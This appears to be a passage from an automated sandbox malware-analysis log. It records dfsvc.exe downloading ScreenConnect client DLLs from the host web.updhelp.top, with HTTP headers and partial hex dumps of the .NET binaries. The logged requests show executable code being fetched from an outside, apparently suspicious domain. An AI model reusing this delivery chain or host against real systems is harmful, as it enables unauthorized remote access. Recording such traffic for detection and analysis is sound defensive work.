                                                                                                                  2025-04-12 15:58:09 UTC1369INData Raw: 00 0a 3a 13 01 00 00 04 6f 1b 01 00 0a 17 28 1d 01 00 0a 13 1d 11 1d 7b 1e 01 00 0a 11 1d 7b 1f 01 00 0a 28 20 01 00 0a 13 1e 11 1e 6f 21 01 00 0a 13 20 11 20 e0 13 1f 11 1f 2c 0a 11 1f 28 22 01 00 0a 58 13 1f 00 11 1e 6f 23 01 00 0a 13 22 11 22 e0 13 21 11 21 2c 0a 11 21 28 22 01 00 0a 58 13 21 00 11 1e 6f 24 01 00 0a 13 24 11 24 e0 13 23 11 23 2c 0a 11 23 28 22 01 00 0a 58 13 23 12 26 fe 15 88 00 00 02 12 26 11 1f 7d 5f 02 00 04 12 26 11 1e 6f 21 01 00 0a 6f 25 01 00 0a 7d 60 02 00 04 12 26 11 21 7d 5d 02 00 04 12 26 11 1e 6f 23 01 00 0a 6f 25 01 00 0a 7d 5e 02 00 04 12 26 11 23 7d 61 02 00 04 12 26 11 1e 6f 24 01 00 0a 6f 25 01 00 0a 7d 62 02 00 04 12 26 18 7d 63 02 00 04 11 26 13 25 14 72 c1 01 00 70 18 16 e0 12 25 e0 16 e0 16 e0 12 08 e0 12 0e e0 28
                                                                                                                  Data Ascii: :o({{( o! ,("Xo#""!!,!("X!o$$$##,#("X#&&}_&o!o%}`&!}]&o#o%}^&#}a&o$o%}b&}c&%rp%(
                                                                                                                  2025-04-12 15:58:09 UTC1369INData Raw: 21 00 00 11 02 03 28 34 01 00 0a 14 18 28 13 00 00 2b 0a 7e 36 01 00 0a 6f 37 01 00 0a 28 38 01 00 0a 0b 07 03 06 28 14 00 00 2b 1f 2c 28 3a 01 00 0a 72 a7 03 00 70 28 3b 01 00 0a 0c 12 02 28 3c 01 00 0a 28 3d 01 00 0a 6f 3e 01 00 0a 7e 36 01 00 0a 07 14 28 3f 01 00 0a 6f 40 01 00 0a 06 0d dd da 00 00 00 26 7e 36 01 00 0a 6f 37 01 00 0a 28 38 01 00 0a 03 6f 41 01 00 0a 25 2d 0d 26 12 07 fe 15 39 00 00 1b 11 07 2b 10 17 8d f6 00 00 01 25 16 1f 2d 9d 28 42 01 00 0a 13 04 12 04 28 43 01 00 0a 12 05 12 06 28 15 00 00 2b 11 05 28 45 01 00 0a 39 84 00 00 00 11 06 28 45 01 00 0a 2c 7b 28 3b 01 00 0a 11 06 12 02 fe 15 5b 00 00 01 08 28 46 01 00 0a 28 47 01 00 0a 23 00 00 00 00 00 00 3e 40 28 48 01 00 0a 28 49 01 00 0a 2c 4c 11 05 17 8d f6 00 00 01 25 16 1f 2c 9d
                                                                                                                  Data Ascii: !(4(+~6o7(8(+,(:rp(;(<(=o>~6(?o@&~6o7(8oA%-&9+%-(B(C(+(E9(E,{(;[(F(G#>@(H(I,L%,
                                                                                                                  2025-04-12 15:58:09 UTC1369INData Raw: 28 2d 00 00 06 2a b2 28 ef 01 00 06 7e a1 00 00 04 25 2d 13 26 14 fe 06 4e 02 00 06 73 74 01 00 0a 25 80 a1 00 00 04 16 8d de 00 00 01 28 2d 00 00 06 2a 13 30 05 00 44 00 00 00 00 00 00 00 7e a2 00 00 04 25 2d 13 26 14 fe 06 f2 01 00 06 73 75 01 00 0a 25 80 a2 00 00 04 7e a1 00 00 04 25 2d 13 26 14 fe 06 4e 02 00 06 73 74 01 00 0a 25 80 a1 00 00 04 02 03 16 8d de 00 00 01 28 1c 00 00 2b 2a 1b 30 02 00 23 00 00 00 24 00 00 11 02 03 28 91 00 00 06 0a 06 28 3a 00 00 06 04 28 93 00 00 06 0b de 0a 06 2c 06 06 6f 11 00 00 0a dc 07 2a 00 01 10 00 00 02 00 08 00 0f 17 00 0a 00 00 00 00 13 30 08 00 60 00 00 00 00 00 00 00 02 72 d7 03 00 70 28 1d 00 00 2b 26 7e a3 00 00 04 25 2d 13 26 14 fe 06 f3 01 00 06 73 76 01 00 0a 25 80 a3 00 00 04 7e a1 00 00 04 25 2d 13 26
                                                                                                                  Data Ascii: (-*(~%-&Nst%(-*0D~%-&su%~%-&Nst%(+*0#$((:(,o*0`rp(+&~%-&sv%~%-&


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.2460856104.21.48.2394432084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-04-12 15:58:11 UTC123OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                  Host: web.updhelp.top
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-04-12 15:58:12 UTC1070INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 12 Apr 2025 15:58:12 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 68608
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: private
                                                                                                                  x-robots-tag: noindex
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  content-disposition: attachment; filename="ScreenConnect.ClientService.dll"; filename*=UTF-8''ScreenConnect.ClientService.dll
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2BGqwyM2yNYq23lcd2jC7iRqBJrAHXldv6UQIrq5tUaG3Ey35M%2BFb5vppak%2F%2FDfcqyTtCQM0T4nomJcluymL3HOOaUaTQxVFZVX2eU5DTP7uAUEAE%2FonDEkkf33m5w1TK9k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 92f3ec79ca42b067-ATL
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=105859&min_rtt=105839&rtt_var=22356&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=714&delivery_rate=38128&cwnd=252&unsent_bytes=0&cid=eef1d9b37cefdbfd&ts=858&x=0"
                                                                                                                  2025-04-12 15:58:12 UTC299INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 de ce b9 c5 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 04 01 00 00 06 00 00 00 00 00 00 1a 22 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 7c 1f 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL" 0" @ |@
                                                                                                                  2025-04-12 15:58:12 UTC1369INData Raw: 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 02 01 00 00 20 00 00 00 04 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 94 03 00 00 00 40 01 00 00 04 00 00 00 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 01 00 00 02 00 00 00 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 21 01 00 00 00 00 00 48 00 00 00 02 00 05 00 70 6f 00 00 2c b1 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 20
                                                                                                                  Data Ascii: 8 H.text@ `.rsrc@@@.reloc`@B!Hpo,
                                                                                                                  2025-04-12 15:58:12 UTC1369INData Raw: 14 28 2c 00 00 0a 26 38 d2 09 00 00 03 75 8f 00 00 01 2d 10 03 75 90 00 00 01 2d 08 03 75 91 00 00 01 2c 05 17 13 06 2b 03 16 13 06 11 06 2c 07 18 0b 38 a7 09 00 00 03 75 92 00 00 01 2d 10 03 75 93 00 00 01 2d 08 03 75 94 00 00 01 2c 05 17 13 06 2b 03 16 13 06 11 06 2c 07 18 0b 38 7c 09 00 00 73 92 00 00 06 13 07 11 07 02 7d 56 00 00 04 11 07 03 75 1f 00 00 01 7d 55 00 00 04 11 07 7b 55 00 00 04 39 47 03 00 00 02 7b 05 00 00 04 13 08 11 08 28 2d 00 00 0a 02 7b 08 00 00 04 28 02 00 00 2b 13 09 02 11 09 2d 0c 12 0d fe 15 10 00 00 1b 11 0d 2b 0c 11 09 28 40 00 00 0a 73 41 00 00 0a 13 0c 12 0c 28 42 00 00 0a 2d 03 14 2b 0c 12 0c 28 43 00 00 0a 28 44 00 00 0a 28 19 00 00 06 13 0a 02 11 07 7b 55 00 00 04 6f 40 00 00 0a 28 44 00 00 0a 28 19 00 00 06 13 0b 11 07
                                                                                                                  Data Ascii: (,&8u-u-u,+,8u-u-u,+,8|s}Vu}U{U9G{(-{(+-+(@sA(B-+(C(D({Uo@(D(
                                                                                                                  2025-04-12 15:58:12 UTC1369INData Raw: 04 11 13 7b 5b 00 00 04 2c 1a 16 0b 02 11 13 fe 06 99 00 00 06 73 1b 00 00 0a 28 0d 00 00 06 38 61 04 00 00 03 75 24 00 00 01 13 14 11 14 2c 3c 17 0b 02 7b 05 00 00 04 13 08 11 08 28 2d 00 00 0a 02 7b 08 00 00 04 d0 24 00 00 01 28 50 00 00 0a 11 14 6f 51 00 00 0a 02 16 28 18 00 00 06 dd 21 04 00 00 11 08 28 33 00 00 0a dc 03 75 a1 00 00 01 2c 26 28 2a 00 00 0a 1c 16 73 68 00 00 0a 28 69 00 00 0a 2c 0c 16 0b 28 12 00 00 06 38 f2 03 00 00 17 0b 38 eb 03 00 00 73 9a 00 00 06 13 15 11 15 11 13 7d 5e 00 00 04 11 15 03 75 5f 00 00 01 7d 5d 00 00 04 11 15 7b 5d 00 00 04 2c 1b 16 0b 11 15 fe 06 9b 00 00 06 73 1b 00 00 0a 14 28 2c 00 00 0a 26 38 aa 03 00 00 03 75 a2 00 00 01 2c 07 17 0b 38 9b 03 00 00 03 75 a3 00 00 01 2c 07 16 0b 38 8c 03 00 00 03 75 a4 00 00 01
                                                                                                                  Data Ascii: {[,s(8au$,<{(-{$(PoQ(!(3u,&(*sh(i,(88s}^u_}]{],s(,&8u,8u,8u
                                                                                                                  2025-04-12 15:58:12 UTC1369INData Raw: 00 00 00 00 00 00 1b 30 06 00 77 00 00 00 05 00 00 11 73 a8 00 00 06 0a 06 03 7d 67 00 00 04 02 7b 06 00 00 04 0b 07 28 2d 00 00 0a 02 7b 09 00 00 04 7e 3b 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 75 00 00 06 73 95 00 00 0a 25 80 3b 00 00 04 6f 96 00 00 0a 26 02 7b 09 00 00 04 28 97 00 00 0a 7e 98 00 00 0a 18 06 fe 06 a9 00 00 06 73 37 00 00 0a 14 6f 0e 00 00 2b 6f 9a 00 00 0a de 07 07 28 33 00 00 0a dc 2a 00 01 10 00 00 02 00 1a 00 55 6f 00 07 00 00 00 00 1b 30 02 00 c6 00 00 00 06 00 00 11 02 7b 05 00 00 04 0a 06 28 2d 00 00 0a 02 7b 07 00 00 04 6f 9b 00 00 0a 17 59 0b 38 95 00 00 00 02 7b 07 00 00 04 07 6f 9c 00 00 0a 6f 53 00 00 06 2c 7e 02 7b 07 00 00 04 07 6f 9c 00 00 0a 6f 51 00 00 06 04 28 0f 00 00 2b 2c 65 0f 03 28 49 00 00 0a 2c 26 02 7b 07 00
                                                                                                                  Data Ascii: 0ws}g{(-{~;%-&~+us%;o&{(~s7o+o(3*Uo0{(-{oY8{ooS,~{ooQ(+,e(I,&{
                                                                                                                  2025-04-12 15:58:12 UTC1369INData Raw: 27 00 00 1b 25 16 7e 28 00 00 0a 6f 73 00 00 0a a2 25 17 7e 28 00 00 0a 6f 77 00 00 0a a2 25 18 7e 28 00 00 0a 6f 79 00 00 0a a2 06 fe 06 b8 00 00 06 73 c2 00 00 0a 28 18 00 00 2b 28 c3 00 00 0a 28 19 00 00 2b 2a 00 00 1b 30 05 00 8f 00 00 00 0a 00 00 11 02 7b 05 00 00 04 0a 06 28 2d 00 00 0a 73 b9 00 00 06 0b 07 02 02 7b 08 00 00 04 7e 44 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 7e 00 00 06 73 71 00 00 0a 25 80 44 00 00 04 28 0b 00 00 2b 28 13 00 00 06 7d 72 00 00 04 02 7b 08 00 00 04 07 fe 06 ba 00 00 06 73 c5 00 00 0a 28 1a 00 00 2b 2c 23 02 28 26 00 00 06 73 c6 00 00 0a 25 1e 6f c7 00 00 0a 25 07 7b 72 00 00 04 6f c8 00 00 0a 6f 94 00 00 0a de 07 06 28 33 00 00 0a dc 2a 00 01 10 00 00 02 00 0d 00 7a 87 00 07 00 00 00 00 13 30 04 00 ab 01 00 00 0b 00
                                                                                                                  Data Ascii: '%~(os%~(ow%~(oys(+((+*0{(-s{~D%-&~+~sq%D(+(}r{s(+,#(&s%o%{roo(3*z0
                                                                                                                  2025-04-12 15:58:12 UTC1369INData Raw: 00 00 2b 25 2d 07 26 16 38 8d 00 00 00 7e 4c 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 86 00 00 06 73 c5 00 00 0a 25 80 4c 00 00 04 28 2b 00 00 2b 25 2d 0d 26 12 04 fe 15 34 00 00 1b 11 04 2b 4d 28 f7 00 00 0a 25 2d 0d 26 12 04 fe 15 34 00 00 1b 11 04 2b 38 28 f8 00 00 0a 1b 8d 42 00 00 01 25 16 1e 6a 9f 25 17 1f 10 6a 9f 25 18 1f 20 6a 9f 25 19 20 80 00 00 00 6a 9f 25 1a 20 00 00 10 00 6a 9f 28 2c 00 00 2b 73 e4 00 00 0a 13 04 12 04 28 e5 00 00 0a 2b 01 17 28 2d 00 00 2b 0d 06 28 97 00 00 0a 6f fb 00 00 0a 7d 79 00 00 04 02 7b 07 00 00 04 6f fc 00 00 0a 13 05 2b 5c 12 05 28 fd 00 00 0a 13 06 11 06 6f 55 00 00 06 07 13 07 12 07 28 48 00 00 0a fe 01 12 07 28 49 00 00 0a 5f 2c 0f 11 06 6f 57 00 00 06 08 28 fe 00 00 0a 2c 0b 11 06 16 6a 6f 5a 00 00 06 2b 1c
                                                                                                                  Data Ascii: +%-&8~L%-&~+s%L(++%-&4+M(%-&4+8(B%j%j% j% j% j(,+s(+(-+(o}y{o+\(oU(H(I_,oW(,joZ+
                                                                                                                  2025-04-12 15:58:12 UTC1369INData Raw: 00 0a 72 03 02 00 70 72 23 02 00 70 17 28 1b 01 00 0a 72 03 02 00 70 20 80 00 00 00 28 1a 01 00 0a 72 03 02 00 70 28 20 01 00 0a de 0c 72 23 02 00 70 1d 28 1a 01 00 0a dc 2a 00 01 28 00 00 02 00 22 00 be e0 00 0a 00 00 00 00 02 00 08 01 59 61 01 0c 00 00 00 00 02 00 9b 01 2b c6 01 0c 00 00 00 00 36 02 28 26 00 00 06 03 6f 94 00 00 0a 2a 92 02 28 26 00 00 06 73 21 01 00 0a 25 03 6f 22 01 00 0a 6f 23 01 00 0a 25 17 6f 24 01 00 0a 6f 94 00 00 0a 2a 36 02 28 11 00 00 06 02 28 2e 00 00 06 2a ae 02 7b 08 00 00 04 7e 40 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 79 00 00 06 73 25 01 00 0a 25 80 40 00 00 04 28 33 00 00 2b 2a 00 00 00 13 30 05 00 4e 00 00 00 00 00 00 00 73 26 01 00 0a 25 03 7b 27 01 00 0a 6f 28 01 00 0a 25 03 7b 29 01 00 0a 6f 2a 01 00 0a 25 03 7b
                                                                                                                  Data Ascii: rpr#p(rp (rp( r#p(*("Ya+6(&o*(&s!%o"o#%o$o*6((.*{~@%-&~+ys%%@(3+*0Ns&%{'o(%{)o*%{
                                                                                                                  2025-04-12 15:58:12 UTC1369INData Raw: 2b 0c 08 2c 12 07 15 6a 33 0d 28 97 00 00 0a 6f fb 00 00 0a 0b 2b 0b 08 2d 08 07 15 6a 2e 03 15 6a 0b 28 97 00 00 0a 6f fb 00 00 0a 07 59 20 60 ea 00 00 6a 31 5d 02 7b 17 00 00 04 7e 93 00 00 04 25 2d 17 26 7e 8e 00 00 04 fe 06 db 00 00 06 73 4e 01 00 0a 25 80 93 00 00 04 28 3e 00 00 2b 6f 56 01 00 0a 13 06 2b 13 11 06 6f 57 01 00 0a 25 1a 7d 83 00 00 04 28 34 00 00 06 11 06 6f 11 00 00 0a 2d e4 de 0c 11 06 2c 07 11 06 6f 10 00 00 0a dc 73 e7 00 00 06 13 07 11 07 02 03 28 58 01 00 0a 7d 9c 00 00 04 11 07 7b 9c 00 00 04 13 08 11 08 7b 59 01 00 0a 12 09 fe 15 1a 00 00 01 11 09 28 5a 01 00 0a 2c 0c 11 08 7b 5b 01 00 0a 39 c6 00 00 00 02 7b 17 00 00 04 7e 94 00 00 04 25 2d 17 26 7e 8e 00 00 04 fe 06 dc 00 00 06 73 4e 01 00 0a 25 80 94 00 00 04 28 3e 00 00 2b
                                                                                                                  Data Ascii: +,j3(o+-j.j(oY `j1]{~%-&~sN%(>+oV+oW%}(4o-,os(X}{{Y(Z,{[9{~%-&~sN%(>+
                                                                                                                  2025-04-12 15:58:12 UTC1369INData Raw: 00 0a 26 2b 1b 02 7b 18 00 00 04 6f 70 01 00 0a 03 02 7b 1a 00 00 04 6a 15 6a 6f 72 01 00 0a 26 03 6f 60 01 00 0a 2c dd 2a 13 30 03 00 43 00 00 00 00 00 00 00 72 44 04 00 70 73 73 01 00 0a d0 db 00 00 01 28 50 00 00 0a 6f 74 01 00 0a 6f 25 00 00 0a 7e 9f 00 00 04 25 2d 17 26 7e 9e 00 00 04 fe 06 eb 00 00 06 73 37 01 00 0a 25 80 9f 00 00 04 28 43 00 00 2b 2a 7e 02 28 47 00 00 06 25 2d 04 26 14 2b 05 6f 25 00 00 0a 14 14 28 75 01 00 0a 28 76 01 00 0a 2a 00 13 30 04 00 30 00 00 00 18 00 00 11 20 00 01 00 00 73 1c 01 00 0a 0a 02 28 47 00 00 06 25 2d 04 26 14 2b 05 6f 25 00 00 0a 02 06 06 6f 1d 01 00 0a 28 77 01 00 0a 28 78 01 00 0a 2a 13 30 05 00 23 00 00 00 19 00 00 11 12 01 fe 15 73 00 00 01 12 01 02 7d 79 01 00 0a 07 0a 14 03 19 12 00 17 28 7a 01 00 0a 28
                                                                                                                  Data Ascii: &+{op{jjor&o`,*0CrDpss(Poto%~%-&~s7%(C+*~(G%-&+o%(u(v*00 s(G%-&+o%o(w(x*0#s}y(z(


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.2460857104.21.48.2394432084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-04-12 15:58:12 UTC90OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                  Host: web.updhelp.top
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  2025-04-12 15:58:13 UTC1051INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 12 Apr 2025 15:58:13 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 549888
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: private
                                                                                                                  x-robots-tag: noindex
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  content-disposition: attachment; filename="ScreenConnect.Core.dll"; filename*=UTF-8''ScreenConnect.Core.dll
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=czbDmz7k4fyR8fPzs1pJIlRJwOIFLDdFPvzNvqLSKu1Q0BWdbTd1tKLdlZfB2NPyrpiw0NghqOTW4DimSut%2BF9jRiaMa%2FT2IXRkq%2FjpbQQUl%2BPltNICMj7XXJNVFkc9Fzfs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 92f3ec82788232e9-JAX
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=112427&min_rtt=112328&rtt_var=23844&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=705&delivery_rate=35850&cwnd=252&unsent_bytes=0&cid=99a1c177f731bbd8&ts=439&x=0"
                                                                                                                  2025-04-12 15:58:13 UTC318INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 ea 83 a3 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 5c 08 00 00 06 00 00 00 00 00 00 42 76 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 a1 05 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL" 0\Bv @
                                                                                                                  2025-04-12 15:58:13 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 5a 08 00 00 20 00 00 00 5c 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 74 03 00 00 00 80 08 00 00 04 00 00 00 5e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 62 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 76 08 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 43 02 00 34 31 06 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 74 08 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: H.textPZ \ `.rsrct^@@.relocb@B!vHC41t
                                                                                                                  2025-04-12 15:58:13 UTC1369INData Raw: 00 00 1b 2d 04 26 14 2b 0b fe 16 82 00 00 1b 6f 43 00 00 0a a2 28 44 00 00 0a 2a 1e 02 7b 4b 00 00 0a 2a 1e 02 7b 4c 00 00 0a 2a 56 02 28 3c 00 00 0a 02 03 7d 4b 00 00 0a 02 04 7d 4c 00 00 0a 2a 13 30 03 00 41 00 00 00 06 00 00 11 03 75 86 00 00 1b 0a 02 06 2e 34 06 2c 2f 28 3d 00 00 0a 02 7b 4b 00 00 0a 06 7b 4b 00 00 0a 6f 3e 00 00 0a 2c 17 28 3f 00 00 0a 02 7b 4c 00 00 0a 06 7b 4c 00 00 0a 6f 40 00 00 0a 2a 16 2a 17 2a d2 20 f2 c5 16 44 20 29 55 55 a5 5a 28 3d 00 00 0a 02 7b 4b 00 00 0a 6f 41 00 00 0a 58 20 29 55 55 a5 5a 28 3f 00 00 0a 02 7b 4c 00 00 0a 6f 42 00 00 0a 58 2a 00 00 13 30 07 00 62 00 00 00 02 00 00 11 14 72 7d 01 00 70 18 8d 0d 00 00 01 25 16 02 7b 4b 00 00 0a 0a 12 00 25 71 81 00 00 1b 8c 81 00 00 1b 2d 04 26 14 2b 0b fe 16 81 00 00 1b
                                                                                                                  Data Ascii: -&+oC(D*{K*{L*V(<}K}L*0Au.4,/(={K{Ko>,(?{L{Lo@*** D )UUZ(={KoAX )UUZ(?{LoBX*0br}p%{K%q-&+
                                                                                                                  2025-04-12 15:58:13 UTC1369INData Raw: 00 00 0a 16 fe 04 16 fe 01 2a 00 00 13 30 03 00 49 00 00 00 00 00 00 00 28 3d 00 00 0a 02 7b 79 00 00 0a 03 7b 79 00 00 0a 6f 3e 00 00 0a 2c 2f 28 3f 00 00 0a 02 7b 7a 00 00 0a 03 7b 7a 00 00 0a 6f 40 00 00 0a 2c 17 28 7e 00 00 0a 02 7b 7b 00 00 0a 03 7b 7b 00 00 0a 6f 7f 00 00 0a 2a 16 2a 00 00 00 13 30 02 00 2c 00 00 00 0a 00 00 11 03 2d 02 17 2a 03 75 99 00 00 1b 2c 0f 03 a5 99 00 00 1b 0a 02 06 28 7d 00 00 0a 2a 72 0c 02 00 70 72 26 02 00 70 73 73 00 00 0a 7a 13 30 03 00 51 00 00 00 08 00 00 11 28 74 00 00 0a 02 7b 79 00 00 0a 03 7b 79 00 00 0a 6f 75 00 00 0a 0a 06 2c 02 06 2a 28 76 00 00 0a 02 7b 7a 00 00 0a 03 7b 7a 00 00 0a 6f 77 00 00 0a 0a 06 2c 02 06 2a 28 80 00 00 0a 02 7b 7b 00 00 0a 03 7b 7b 00 00 0a 6f 81 00 00 0a 0a 06 2a 00 00 00 13 30 02
                                                                                                                  Data Ascii: *0I(={y{yo>,/(?{z{zo@,(~{{{{o**0,-*u,(}*rpr&pssz0Q(t{y{you,*(v{z{zow,*({{{{o*0
                                                                                                                  2025-04-12 15:58:13 UTC1369INData Raw: 00 0a 03 7b 8f 00 00 0a 6f 77 00 00 0a 0a 06 2c 02 06 2a 28 80 00 00 0a 02 7b 90 00 00 0a 03 7b 90 00 00 0a 6f 81 00 00 0a 0a 06 2c 02 06 2a 28 8b 00 00 0a 02 7b 91 00 00 0a 03 7b 91 00 00 0a 6f 8c 00 00 0a 0a 06 2c 02 06 2a 28 97 00 00 0a 02 7b 92 00 00 0a 03 7b 92 00 00 0a 6f 98 00 00 0a 0a 06 2a 00 00 00 13 30 02 00 19 00 00 00 0c 00 00 11 03 75 a1 00 00 1b 2c 0f 03 a5 a1 00 00 1b 0a 02 06 28 93 00 00 0a 2a 16 2a 00 00 00 13 30 02 00 4e 00 00 00 09 00 00 11 7f d3 01 00 04 02 7b 8e 00 00 0a 28 02 00 00 2b 0a 12 00 02 7b 8f 00 00 0a 28 03 00 00 2b 0a 12 00 02 7b 90 00 00 0a 28 04 00 00 2b 0a 12 00 02 7b 91 00 00 0a 28 05 00 00 2b 0a 12 00 02 7b 92 00 00 0a 28 06 00 00 2b 28 2e 06 00 06 2a 00 00 13 30 05 00 57 00 00 00 00 00 00 00 72 8e 02 00 70 1b 8d 0d
                                                                                                                  Data Ascii: {ow,*({{o,*({{o,*({{o*0u,(**0N{(+{(+{(+{(+{(+(.*0Wrp
                                                                                                                  2025-04-12 15:58:13 UTC1369INData Raw: 00 0a 02 7b a9 00 00 0a 03 7b a9 00 00 0a 6f 96 00 00 0a 2c 2f 28 a1 00 00 0a 02 7b aa 00 00 0a 03 7b aa 00 00 0a 6f a2 00 00 0a 2c 17 28 ae 00 00 0a 02 7b ab 00 00 0a 03 7b ab 00 00 0a 6f af 00 00 0a 2a 16 2a 13 30 02 00 2c 00 00 00 0e 00 00 11 03 2d 02 17 2a 03 75 a9 00 00 1b 2c 0f 03 a5 a9 00 00 1b 0a 02 06 28 ad 00 00 0a 2a 72 0c 02 00 70 72 26 02 00 70 73 73 00 00 0a 7a 13 30 03 00 c1 00 00 00 08 00 00 11 28 74 00 00 0a 02 7b a5 00 00 0a 03 7b a5 00 00 0a 6f 75 00 00 0a 0a 06 2c 02 06 2a 28 76 00 00 0a 02 7b a6 00 00 0a 03 7b a6 00 00 0a 6f 77 00 00 0a 0a 06 2c 02 06 2a 28 80 00 00 0a 02 7b a7 00 00 0a 03 7b a7 00 00 0a 6f 81 00 00 0a 0a 06 2c 02 06 2a 28 8b 00 00 0a 02 7b a8 00 00 0a 03 7b a8 00 00 0a 6f 8c 00 00 0a 0a 06 2c 02 06 2a 28 97 00 00 0a
                                                                                                                  Data Ascii: {{o,/({{o,({{o**0,-*u,(*rpr&pssz0(t{{ou,*(v{{ow,*({{o,*({{o,*(
